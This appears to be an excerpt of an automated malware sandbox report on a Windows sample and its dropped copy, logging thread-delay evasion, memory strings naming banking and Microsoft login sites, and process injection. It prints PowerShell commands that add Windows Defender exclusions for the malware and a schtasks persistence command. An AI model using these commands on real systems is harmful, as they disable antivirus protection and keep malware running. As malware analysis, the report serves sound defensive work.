                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597749Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597516Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597391Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597282Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597157Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 597032Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596813Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596688Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596563Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596438Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596328Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 596094Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595141Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 595000Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594891Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594782Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594657Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594547Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594438Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeThread delayed: delay time: 594219Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599859
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599744
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599625
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599514
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599393
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599234
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599125
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 599016
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598891
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598781
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598672
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598557
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598438
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598313
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598203
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 598094
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597969
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597859
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597712
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597594
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597484
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597375
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597265
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597156
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 597047
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596937
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596828
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596719
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596609
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596500
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596391
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596281
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596171
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 596062
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595953
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595844
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595734
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595625
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595516
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595406
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595297
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595187
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 595078
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594969
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594859
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594750
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594641
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594531
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeThread delayed: delay time: 594422
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: svchost.exe, 0000000F.00000002.2858338582.000002C694C50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2857580591.000002C68F629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: wiSeRRwvZHTk.exe, 0000000A.00000002.951366048.00000000013B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: OtldpQxzAw.exe, 00000009.00000002.3302666078.0000000000E26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3303444188.00000000012D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.0000000004370000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_068898D0 LdrInitializeThunk,9_2_068898D0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe"
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeMemory written: C:\Users\user\Desktop\OtldpQxzAw.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeMemory written: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\OtldpQxzAw.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess created: C:\Users\user\Desktop\OtldpQxzAw.exe "C:\Users\user\Desktop\OtldpQxzAw.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeProcess created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe "C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Users\user\Desktop\OtldpQxzAw.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
